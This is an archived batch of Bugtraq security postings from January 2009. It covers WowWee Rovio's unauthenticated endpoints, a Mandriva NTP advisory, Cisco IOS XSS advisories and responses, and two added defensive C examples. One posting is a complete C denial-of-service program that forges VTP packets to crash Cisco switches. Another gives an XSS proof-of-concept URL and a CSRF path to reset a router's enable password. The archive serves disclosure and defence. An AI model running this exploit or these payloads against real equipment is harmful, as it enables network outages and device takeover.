http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner 
designed specifically for Oracle, can be used to accurately determine 
whether your servers are vulnerable to these flaws. More information about 
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oraclephp

About NGSSoftware
*****************
NGSSoftware, an NCC Group Company, develops vulnerability assessment and 
compliancy tools for database servers including Oracle, Microsoft SQL 
Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS 
has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and 
Seattle in the United States; NGS provide services to some of the largest 
and most demanding organizations around the globe.

http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076


From - Wed Jan 14 12:42:17 2009
Date: Wed, 14 Jan 2009 03:41:59 -0500
From: "Brian Dowling" <bjd@simplicity.net>
To: bugtraq@securityfocus.com
Subject: WowWee Rovio - Insufficient Access Controls - Covert Audio/Video Snooping Possible

SUMMARY

WowWee Rovio - Insufficient Access Controls - Covert Audio/Video
Snooping Possible

OVERVIEW

Rovio from WowWee does not adequately secure all accessible URLs or media
streams, enabling an unauthorized user with network access to the robotic
webcam platform the ability to listen to and view audio/video streamed from
the device's onboard camera.  Additionally, audio-send capabilities are also
not secured, enabling mischievous sending of audio through Rovio's built-in
speaker.  Additional manipulations may be possible, robot control does not
appear to be impacted at this time.

DESCRIPTION

From WowWee Website:

     Rovio(tm) is the ground breaking new Wi-Fi enable mobile webcam that lets
     you view and interact with its environment through streaming video and
     audio, wherever you are!

Unfortunately, Rovio's access control mechanisms (username/password) are not
completely utilized across the platform even when enabled.  Certain URLs and
RTSP Streaming capabilities of the device are accessible with no
authentication.  Furthermore, deployment of the device in the default
configuration attempts to use UPnP to automatically configure your firewall to
allow external access to the mobile webcam platform.

Resources exposed without proper access controls include:

rtsp://[rovio]/webcam   -- RTSP Audio/Video Stream, directly accessible.

and the following http://[rovio]:[publishedport]/ URLs are accessible to anyone:

/GetUPnP.cgi            -- Get UPnP config, including ports in use for RTSP
/GetStatus.cgi          -- display general device status
/GetVer.cgi             -- display firmware version, enables targeted
                           attacks, discovery.
/ScanWlan.cgi           -- display WiFi Networks visible to device
/GetAudio.cgi           -- "Send" audio to Rovio's speaker, "What's up Doc?"
/GetMac.cgi             -- device MAC address
/Upload.cgi             -- upload new firmware [actual upload untested]
/GetUpdateProgress.cgi
/GetTime.cgi
/GetLogo.cgi
/GetName.cgi
/GetVNet.cgi
/description.xml
/cmgr/control
/cmgr/event
/cdir/control
/cdir/event
/Cmd.cgi                -- Accessible without arguments, but does not appear
                           to allow ACL bypass to normally protected
                           sub-commands.  Unknown if any hidden commands exist.

/SendHttp.cgi           -- When authentication is enabled, this appears to be
                           protected.  However in a default configuration with
                           no authentication, it could provide for interesting
                           reverse-proxy like manipulation of web-based
                           firewall admin interfaces.

                           Additionally, this script is used by the "Ping
                           Test" that WowWee sends to their servers to help
                           verify your internet connectivity and UPnP settings
                           are working.  What's disheartening here is that
                           your IP address and rovio's port are sent to WowWee
                           and potentially stored in their server logs.


ADDITIONAL ISSUES

Additionally, WowWee is advised that they should alter the default
configuration to not automatically utilize UPnP to attempt to open up external
access to these devices.

1) In the default configuration no authentication is required until the user
   sets up accounts.

2) Proper notification should be displayed to users regarding the potential
   risks and ramifications of these settings and they must be involved in the
   decision process, by being required to take action to agree to
   expose such devices to external access.

Additionally, it should be noted that the platform uses HTTP Basic
authentication over unencrypted HTTP.  Using such mechanisms across the
internet does expose users to network-sniffing attacks, where an attacker
could obtain the credentials or observe the data streams being transmitted.

IMPACT

Users of this mobile wi-fi webcam may unwittingly open their homes up to
anonymous eaves-dropping of their personal lives and communications.

SOLUTION

WowWee must supply an updated firmware that fixes these issues.

WORKAROUND

Users of these devices are encouraged to disable direct external access and
seek other means to secure such access (Authenticated, Encrypting Proxies, or
Access over a VPN connection for example).  It is understood that most
consumers of these devices do not have such means, so WowWee should be
compelled to provide adequate protection and access controls.

REFERENCES

http://www.simplicity.net/vuln/2009-01-Rovio-insecurity.html
http://www.wowwee.com/en/products/tech/household/rovio

CREDIT

This issue was discovered and disclosed by Brian Dowling of Simplicity
Communications.

HISTORY

2009-01-06 - Initial Report to WowWee support.
2009-01-07 - Second request to simply confirm receipt of my first notification.
2009-01-08 - Automated, canned response from web-submission form.
2009-01-14 - Due to lack of appropriate, timely response, additional insight
             contained above and general concern for users of these devices
             unknowingly being exposed in this way, this information has been
             publicly disclosed.  Hopefully as WowWee forays into more
             networked-enabled consumer devices they will provide proper
             channels and handling for vulnerability disclosure.

From - Wed Jan 14 12:42:18 2009
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:007 ] ntp
Date: Tue, 13 Jan 2009 18:49:01 -0700
From: security@mandriva.com


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:007
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : ntp
 Date    : January 13, 2009
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 A flaw was found in how NTP checked the return value of signature
 verification.  A remote attacker could use this to bypass certificate
 validation by using a malformed SSL/TLS signature (CVE-2009-0021).
 
 The updated packages have been patched to prevent this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0021
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 91f0330a936cb343029aec711da0ce4f  2008.0/i586/ntp-4.2.4-10.1mdv2008.0.i586.rpm
 e7e6559f0431ff856d0da0b1d5a590a4  2008.0/i586/ntp-client-4.2.4-10.1mdv2008.0.i586.rpm
 05f3b3c5777f6bef48ee85fefeaff8a8  2008.0/i586/ntp-doc-4.2.4-10.1mdv2008.0.i586.rpm 
 a9cd3b03e611b517664ffae074da31da  2008.0/SRPMS/ntp-4.2.4-10.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 e68c5263d456ec90d157787e70b17b99  2008.0/x86_64/ntp-4.2.4-10.1mdv2008.0.x86_64.rpm
 85e0c28eae68bcdcca997c5c2bb9bf8c  2008.0/x86_64/ntp-client-4.2.4-10.1mdv2008.0.x86_64.rpm
 ffbd2a9f924478d27f33ad13e1c4e250  2008.0/x86_64/ntp-doc-4.2.4-10.1mdv2008.0.x86_64.rpm 
 a9cd3b03e611b517664ffae074da31da  2008.0/SRPMS/ntp-4.2.4-10.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 1a9909288448845fa41b220b50917ee1  2008.1/i586/ntp-4.2.4-15.1mdv2008.1.i586.rpm
 6693319db15308f559912c9fe989bdd6  2008.1/i586/ntp-client-4.2.4-15.1mdv2008.1.i586.rpm
 63758cadb1cf81ebb7bef096dc285f2f  2008.1/i586/ntp-doc-4.2.4-15.1mdv2008.1.i586.rpm 
 ca06251ccab188cdb4f28fba35190eb6  2008.1/SRPMS/ntp-4.2.4-15.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 9c7b290e643cae08556bd3b1f6380926  2008.1/x86_64/ntp-4.2.4-15.1mdv2008.1.x86_64.rpm
 7fd00c9b82a0ca577962d59975433071  2008.1/x86_64/ntp-client-4.2.4-15.1mdv2008.1.x86_64.rpm
 f99d1d7980dd6788a0f0c4924241a6d3  2008.1/x86_64/ntp-doc-4.2.4-15.1mdv2008.1.x86_64.rpm 
 ca06251ccab188cdb4f28fba35190eb6  2008.1/SRPMS/ntp-4.2.4-15.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 82ed4b25f0a0c1c607e5819ec1d70603  2009.0/i586/ntp-4.2.4-18.1mdv2009.0.i586.rpm
 71855df81d8dd138d54fb24f5c221a5b  2009.0/i586/ntp-client-4.2.4-18.1mdv2009.0.i586.rpm
 30874a706c15d4086df8493af51f5082  2009.0/i586/ntp-doc-4.2.4-18.1mdv2009.0.i586.rpm 
 248052356a2606f377debf55257b6855  2009.0/SRPMS/ntp-4.2.4-18.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 c6462453877b538618e8bf8d0132b1a3  2009.0/x86_64/ntp-4.2.4-18.1mdv2009.0.x86_64.rpm
 abe80d9922eb665d6e5be56197895a68  2009.0/x86_64/ntp-client-4.2.4-18.1mdv2009.0.x86_64.rpm
 eb780b2e38ebb1b4ee1999c4f0429231  2009.0/x86_64/ntp-doc-4.2.4-18.1mdv2009.0.x86_64.rpm 
 248052356a2606f377debf55257b6855  2009.0/SRPMS/ntp-4.2.4-18.1mdv2009.0.src.rpm

 Corporate 3.0:
 d1593543a5d37e6b8ea2c8468ce1d0d3  corporate/3.0/i586/ntp-4.2.0-2.1.C30mdk.i586.rpm 
 fc6c1a4605258d876c8a09d7d0d116ef  corporate/3.0/SRPMS/ntp-4.2.0-2.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 1214dd1fed42c4acd3ad36da9bd8b0ea  corporate/3.0/x86_64/ntp-4.2.0-2.1.C30mdk.x86_64.rpm 
 fc6c1a4605258d876c8a09d7d0d116ef  corporate/3.0/SRPMS/ntp-4.2.0-2.1.C30mdk.src.rpm

 Corporate 4.0:
 dcc6abed648d3baac3233264bc107517  corporate/4.0/i586/ntp-4.2.0-21.3.20060mlcs4.i586.rpm
 d1c9cf4d821856af81ce574fa08c1f52  corporate/4.0/i586/ntp-client-4.2.0-21.3.20060mlcs4.i586.rpm 
 50c665296cd7d09f4e98ae04e998e350  corporate/4.0/SRPMS/ntp-4.2.0-21.3.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 6c41fd0f995d8cf8cf216bf82e062de0  corporate/4.0/x86_64/ntp-4.2.0-21.3.20060mlcs4.x86_64.rpm
 da7f3cd1385ae2250cd191182079c037  corporate/4.0/x86_64/ntp-client-4.2.0-21.3.20060mlcs4.x86_64.rpm 
 50c665296cd7d09f4e98ae04e998e350  corporate/4.0/SRPMS/ntp-4.2.0-21.3.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 d7ff99538a0da678adcc5606913bc1b6  mnf/2.0/i586/ntp-4.2.0-2.1.C30mdk.i586.rpm 
 c8af767376df674dd434307c628e30cd  mnf/2.0/SRPMS/ntp-4.2.0-2.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbRVSmqjQ0CJFipgRAt23AJ43dVc9u32PRtOsFf8+xdJzSIx+wACdFIK3
LT/YaZTGtZnOdbhIr2LV9dg#nb
-----END PGP SIGNATURE-----
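
The return-value flaw described in the advisory above, as an added example (not NTP's or Mandriva's code): verification APIs such as OpenSSL's EVP_VerifyFinal report three outcomes (1 valid, 0 invalid, negative on error), and a caller that only tests for 0 treats an error raised by a malformed signature as success. The names toy_sign, toy_verify, accept_flawed and accept_strict are hypothetical, and the digest is a constructed stand-in, not real cryptography.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed toy "signature": a 32-bit FNV-1a digest of the message,
 * stored big-endian. NOT cryptography; it only gives the verifier
 * something to compare so all three return values can be exercised. */
#define SIG_LEN 4

static uint32_t toy_digest(const uint8_t *msg, size_t len)
{
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < len; i++) {
        h ^= msg[i];
        h *= 16777619u;
    }
    return h;
}

void toy_sign(const uint8_t *msg, size_t len, uint8_t sig[SIG_LEN])
{
    uint32_t h = toy_digest(msg, len);
    sig[0] = (uint8_t)(h >> 24);
    sig[1] = (uint8_t)(h >> 16);
    sig[2] = (uint8_t)(h >> 8);
    sig[3] = (uint8_t)h;
}

/* Hypothetical verifier with a tri-state contract:
 *    1  signature is valid
 *    0  signature is well formed but does not match
 *   -1  error: the signature could not be processed at all */
int toy_verify(const uint8_t *msg, size_t len,
               const uint8_t *sig, size_t sig_len)
{
    if (msg == NULL || sig == NULL || sig_len != SIG_LEN)
        return -1;                      /* malformed input */
    uint32_t got = ((uint32_t)sig[0] << 24) | ((uint32_t)sig[1] << 16) |
                   ((uint32_t)sig[2] << 8)  |  (uint32_t)sig[3];
    return got == toy_digest(msg, len) ? 1 : 0;
}

/* Flawed caller: only 0 is treated as failure, so the error
 * value -1 falls through and the data is accepted. */
int accept_flawed(const uint8_t *msg, size_t len,
                  const uint8_t *sig, size_t sig_len)
{
    if (!toy_verify(msg, len, sig, sig_len))
        return 0;
    return 1;
}

/* Corrected caller: success is exactly 1; everything else rejects. */
int accept_strict(const uint8_t *msg, size_t len,
                  const uint8_t *sig, size_t sig_len)
{
    return toy_verify(msg, len, sig, sig_len) == 1;
}

int main(void)
{
    const uint8_t msg[] = "constructed certificate body";
    size_t len = sizeof msg - 1;
    uint8_t sig[SIG_LEN];

    toy_sign(msg, len, sig);
    printf("valid      flawed=%d strict=%d\n",
           accept_flawed(msg, len, sig, SIG_LEN),
           accept_strict(msg, len, sig, SIG_LEN));

    sig[0] ^= 0x01;                     /* well formed, wrong value */
    printf("mismatch   flawed=%d strict=%d\n",
           accept_flawed(msg, len, sig, SIG_LEN),
           accept_strict(msg, len, sig, SIG_LEN));
    sig[0] ^= 0x01;

    /* malformed: wrong length, so the verifier returns -1 */
    printf("malformed  flawed=%d strict=%d\n",
           accept_flawed(msg, len, sig, SIG_LEN - 1),
           accept_strict(msg, len, sig, SIG_LEN - 1));
    return 0;
}
```

When auditing callers of such an API, look for `!verify(...)` and `verify(...) != 0` style tests; both mishandle the negative error return.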

From - Wed Jan 14 13:02:17 2009
Subject: RE: DoS code for Cisco VLAN Trunking Protocol Vulnerability
Date: Wed, 14 Jan 2009 11:50:38 +0800
From: "Paul Oxman (poxman)" <poxman@cisco.com>
To: "showrun.lee" <showrun.lee@gmail.com>,
<bugtraq@securityfocus.com>, <full-disclosure@lists.grok.org.uk>

 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,
This is Paul Oxman with Cisco PSIRT.

For mitigations and workarounds, please consult the Cisco 
Security Response available at: 
http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml

Regards

________________________________

From: showrun.lee [mailto:showrun.lee@gmail.com] 
Sent: Wednesday, January 14, 2009 7:59 AM
To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
Cc: Paul Oxman (poxman)
Subject: DoS code for Cisco VLAN Trunking Protocol Vulnerability


/*DoS code for Cisco VLAN Trunking Protocol Vulnerability
 *
 *vulnerability description:
 *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
 *
 *To know:
 * 1.the switch must be in Server/Client Mode.
 * 2.the port the attacker is connected to must be in trunk Mode.
 *   Cisco Ethernet ports with no configuration are not
 *   in trunk, but trunk mode can be obtained through DTP
 *   attack by Yersinia.
 * 3.you must know the vtp domain; this can be sniffed
 * 4.some code is from Yersinia.
 *
 *Result:
 * switch reload.
 *
 *
 *Compile:
 * gcc -o vtp `libnet-config --libs` vtp.c
 * 
 *Usage:vtp -i <interface> -d <vtp_domain>
 *
 *Contact: showrun.lee[AT]gmail.com
 *http://sh0wrun.blogspot.com/
 */
#include <libnet.h>
#include <stdio.h>
#include <stdlib.h>

#define VTP_DOMAIN_SIZE    32
#define VTP_TIMESTAMP_SIZE 12

struct vtp_summary {
     u_int8_t  version;
     u_int8_t  code;
     u_int8_t  followers;
     u_int8_t  dom_len;
     u_int8_t  domain[VTP_DOMAIN_SIZE];
     u_int32_t revision;
     u_int32_t updater;
     u_int8_t  timestamp[VTP_TIMESTAMP_SIZE];
     u_int8_t  md5[16];
};

struct vtp_subset {
     u_int8_t  version;
     u_int8_t  code;
     u_int8_t  seq;
     u_int8_t  dom_len;
     u_int8_t  domain[VTP_DOMAIN_SIZE];
     u_int32_t revision;
};

void usage( char *s) {
    printf("%s -i <interface> -d <vtp domain>\n",s);
    exit (1);
}

int main( int argc, char *argv[] )
{
    int opt,k=0;
    extern char *optarg;
    libnet_ptag_t t;
    libnet_t *lhandler;
    u_int32_t vtp_len=0, sent;
    struct vtp_summary *vtp_summ;
    struct vtp_subset *vtp_sub;
    u_int8_t *vtp_packet,*vtp_packet2, *aux;
    u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
    u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
    u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };
    struct libnet_ether_addr *mymac;
    char *device;
    char error_information[LIBNET_ERRBUF_SIZE];
    char *domain;

// get options
     while ((opt = getopt(argc, argv, "i:d:")) != -1)
     {
          switch (opt) {
          case 'i':
          device=malloc(strlen(optarg)+1); /* +1 for the terminating NUL */
          strcpy(device,optarg);
          k=1;
          break;

          case 'd':
          domain=malloc(strlen(optarg)+1); /* +1 for the terminating NUL */
          strcpy(domain,optarg);
          break;
          
          default: usage(argv[0]);
          }
     }
     if(!k) { printf("  %s -i <interface> -d <vtp domain>\n     must assign the interface\n",argv[0]);exit(1);}

//init libnet

    lhandler=libnet_init(LIBNET_LINK,device,error_information);
    if (!lhandler) {
             fprintf(stderr, "libnet_init: %s\n", error_information);
             return -1;
     }

    mymac=libnet_get_hwaddr(lhandler);
//build the first packet for vtp_summary
    vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
    vtp_packet = calloc(1,vtp_len);
    aux = vtp_packet;
    memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
    aux+=sizeof(cisco_data);
    vtp_summ = (struct vtp_summary *)aux;
    vtp_summ->version = 0x01;
    vtp_summ->code = 0x01;//vtp_summary
    vtp_summ->followers = 0x01;
    vtp_summ->dom_len = strlen(domain);
    memcpy(vtp_summ->domain,domain,strlen(domain));
    vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);

     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);
     
//build the second vtp packet for vtp_subset 
     vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
     vtp_packet2 = calloc(1,vtp_len);
     aux = vtp_packet2;
     memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
     aux+=sizeof(cisco_data);
     
     vtp_sub = (struct vtp_subset *)aux;
     vtp_sub->version = 0x01;
     vtp_sub->code = 0x02; //vtp_subset
     vtp_sub->seq = 0x01;
     vtp_sub->dom_len = strlen(domain);
     memcpy(vtp_sub->domain,domain,strlen(domain)); 
     vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok
//     memcpy(vtp_sub->aaa,aaa,strlen(aaa)); 
     
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet2,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);
     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        free(vtp_packet2);
        return -1;
     }
     libnet_clear_packet(lhandler);
}


-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSW1hDvOp/xnPFP7gEQKwFQCfQ32qUNzWFL8dISsQew6+JQAFcnoAnRKq
yEEThaENUXT3HaLpVs+mdMHD
=U4Vq
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:02:18 2009
Date: Wed, 14 Jan 2009 11:37:06 +0000
From: ProCheckUp Research <research@procheckup.com>
To: <bugtraq@securityfocus.com>
Subject: PR08-19: XSS on Cisco IOS HTTP Server

PR08-19: XSS on Cisco IOS HTTP Server

Date found: 1st August 2008

Vendor contacted: 1st August 2008

Advisory publicly released: 14th January 2009

Severity: Medium

Credits: Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)

Description:

Cisco IOS HTTP server is vulnerable to XSS within invalid parameters
processed by the "/ping" server-side binary/script.


Consequences:

An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to the HTTP server of a
Cisco device.

This type of attack can result in non-persistent defacement of the
target admin interface, or the redirection of confidential information
to unauthorised third parties. i.e.: by scraping the data returned by
the '/level/15/exec/-/show/run/CR' URL via the XMLHttpRequest object.

It might also be possible to perform administrative changes by
submitting forged commands (CSRF) within the payload of the XSS attack.
i.e.: injecting an 'img' tag which points to
'/level/15/configure/-/enable/secret/newpass' would change the enable
password to 'newpass'.


Notes:

1. The victim administrator needs to be currently authenticated for this
vulnerability to be exploitable

2. In order to exploit this vulnerability successfully, the attacker
only needs to know the IP address of the Cisco device. There is NO need
to have access to the IOS HTTP server

Proof of concept (PoC):

http://192.168.100.1/ping?<script>alert("Running+code+within+the_context+of+"%2bdocument.domain)</script>


Content of HTML body returned:

<BODY BGCOLOR=#FFFFFF><H2>test-router</H2><HR><DT>Error: URL syntax:
?<script>alert("Running code within the_context of
"+document.domain)</script></BODY>

Successfully tested on:

Cisco 1803
Cisco IOS Software, C180X Software (C180X-ADVIPSERVICESK9-M), Version
12.4(6)T7, RELEASE SOFTWARE (fc5)


Assigned Cisco Bug ID#:

CSCsr72301

CVE reference:

CVE-2008-3821


References:

http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr08-19
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml

Fix:

Please see Cisco advisory for information on available updates.


Legal:

Copyright 2009 ProCheckUp Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if the Bulletin is not changed or edited in any way, is attributed
to ProCheckUp indicating this web page URL, and provided such
reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. ProCheckUp is not
liable for any misuse of this information by any third party. ProCheckUp
is not responsible for the content of external Internet sites.
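
The response body quoted in the advisory above shows the request's query string echoed into HTML without escaping. The following added example (not Cisco's or ProCheckUp's code; the function names and buffer sizes are assumptions) builds the same error page both ways, so the unescaped echo can be compared with an HTML-escaped one.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Entity for characters that are special in HTML text or attribute
 * context, or NULL if the character can be copied unchanged. */
static const char *html_entity(char c)
{
    switch (c) {
    case '&':  return "&amp;";
    case '<':  return "&lt;";
    case '>':  return "&gt;";
    case '"':  return "&quot;";
    case '\'': return "&#39;";
    default:   return NULL;
    }
}

/* Escape src into dst (capacity cap, including the NUL).
 * Returns the escaped length, or -1 if it does not fit; on failure
 * dst is emptied so a half-written entity is never emitted. */
long html_escape(char *dst, size_t cap, const char *src)
{
    size_t used = 0;

    if (dst == NULL || src == NULL || cap == 0)
        return -1;
    for (; *src != '\0'; src++) {
        const char *ent = html_entity(*src);
        size_t n = ent ? strlen(ent) : 1;

        if (used + n >= cap) {          /* keep room for the NUL */
            dst[0] = '\0';
            return -1;
        }
        if (ent)
            memcpy(dst + used, ent, n);
        else
            dst[used] = *src;
        used += n;
    }
    dst[used] = '\0';
    return (long)used;
}

/* Page layout taken from the response body quoted in the advisory. */
#define BODY_FMT \
    "<BODY BGCOLOR=#FFFFFF><H2>%s</H2><HR><DT>Error: URL syntax: ?%s</BODY>"

/* Behaviour the advisory describes: the query is echoed verbatim. */
int error_body_raw(char *out, size_t cap, const char *host, const char *query)
{
    int n = snprintf(out, cap, BODY_FMT, host, query);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* Hardened form: every echoed value is escaped before it reaches the page. */
int error_body_escaped(char *out, size_t cap, const char *host, const char *query)
{
    char h[128], q[1024];               /* assumed size limits */
    int n;

    if (html_escape(h, sizeof h, host) < 0 ||
        html_escape(q, sizeof q, query) < 0)
        return -1;                      /* refuse rather than truncate */
    n = snprintf(out, cap, BODY_FMT, h, q);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

int main(void)
{
    /* Decoded query string from the advisory's quoted response. */
    const char *q = "<script>alert(\"Running code within the_context of \""
                    "+document.domain)</script>";
    char page[2048];

    if (error_body_raw(page, sizeof page, "test-router", q) > 0)
        printf("raw:     %s\n", page);
    if (error_body_escaped(page, sizeof page, "test-router", q) > 0)
        printf("escaped: %s\n", page);
    return 0;
}
```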

From - Wed Jan 14 13:22:18 2009
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Response: Cisco IOS Cross-Site Scripting Vulnerabilities
Date: Wed, 14 Jan 2009 17:00:00 +0100

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Response: Cisco IOS Cross-Site Scripting
Vulnerabilities

http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml

Revision 1.0

For Public Release 2009 January 14 1600 UTC (GMT)

- ---------------------------------------------------------------------

Cisco Response
=============
Two separate Cisco IOS  Hypertext Transfer Protocol (HTTP) cross-site
scripting (XSS) vulnerabilities have been reported to Cisco by two
independent researchers. ProCheckup has posted a Security Advisory
titled "XSS on Cisco IOS HTTP Server" posted at 
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr08-19

Cisco would like to thank Adrian Pastor and Richard J. Brain of
ProCheckUp and Nobuhiro Tsuji of NTT Data Security Corporation with
co-operation of JPCert.

This Cisco Security Response is posted at the following link: 
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml

Additional Information
=====================
This response covers two separate cross-site scripting
vulnerabilities within the Cisco IOS Hypertext Transfer Protocol
(HTTP) server (including HTTP secure server - hereafter referred to
as purely HTTP Server) and applies to all Cisco products that run
Cisco IOS Software versions 11.0 through 12.4 with the HTTP server
enabled. A system that contains the IOS HTTP server or HTTP secure
server, but does not have it enabled, is not affected.

To determine if the HTTP server is running on your device, issue the
"show ip http server status | include status" and the "show ip http
server secure status | include status" commands at the prompt and look
for output similar to:

    Router#show ip http server status | include status
    HTTP server status: Enabled
    HTTP secure server status: Enabled

If the device is not running the HTTP server, you should see output
similar to:

    Router#show ip http server status | include status
    HTTP server status: Disabled
    HTTP secure server status: Disabled

These vulnerabilities are documented in the following Cisco bug IDs:

  * Cisco bug ID CSCsi13344 - XSS in IOS HTTP Server 
    Special Characters are not escaped in URL strings sent to the
    HTTP server.
  * Cisco bug ID CSCsr72301 - XSS in IOS HTTP Server (ping parameter)
    Special Characters are not escaped in URL strings sent to the
    HTTP server, via the ping parameter. The ping parameter is used
    both by external applications such as Router and Security Device
    Manager (SDM) as well as a direct HTTP session to Cisco IOS http
    server. This vulnerability affects 12.1E based trains and all
    Cisco IOS releases after 12.2(13)T.

These vulnerabilities are independent of each other. For a full
solution, download a Cisco IOS version that contains the fixes for
both Cisco bug IDs. These vulnerabilities have been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2008-3821.

Workaround
+---------

If the HTTP server is not used for any legitimate purposes on the
device, it is a best practice to disable it by issuing the following
commands in configure mode:

    no ip http server
    no ip http secure-server

If the HTTP server is required, it is a recommended best practice to
control which hosts may access the HTTP server to only trusted
sources. To control which hosts can access the HTTP server, you can
apply an access list to the HTTP server. To apply an access list to
the HTTP server, use the following command in global configuration
mode:

    ip http access-class {access-list-number | access-list-name}

The following example shows an access list that allows only trusted
hosts to access the Cisco IOS HTTP server:

    ip access-list standard 20
    permit 192.168.1.0 0.0.0.255
    remark "Above is a trusted subnet"
    remark "Add further trusted subnets or hosts below"

    ! (Note: all other access implicitly denied)
    ! (Apply the access-list to the http server)

    ip http access-class 20

For additional information on configuring the Cisco IOS HTTP server,
consult Using the Cisco Web Browser User Interface.

For additional information on cross-site scripting attacks and the
methods used to exploit these vulnerabilities, please refer to the
Cisco Applied Mitigation Bulletin "Understanding Cross-Site Scripting
(XSS) Threat Vectors", which is available at the following link:
http://www.cisco.com/warp/public/707/cisco-amb-20060922-understanding-xss.shtml

Further Problem Description
+--------------------------

This vulnerability is about escaping characters in the URL that are
sent to the HTTP server. This vulnerability is different from the
vulnerability reported in Cisco bug ID CSCsc64976. The fix for this
vulnerability is to escape special characters in the URL string 
echoed in the response generated by the web exec application.

Software Version and Fixes
+-------------------------

When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center ("TAC") or your contracted
maintenance provider for assistance.

Each row of the Cisco IOS software table (below) describes a release
